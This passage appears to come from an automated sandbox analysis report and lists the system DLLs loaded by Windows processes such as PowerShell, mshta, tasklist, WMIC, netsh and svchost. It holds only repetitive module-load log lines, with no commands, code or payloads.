              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
              Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
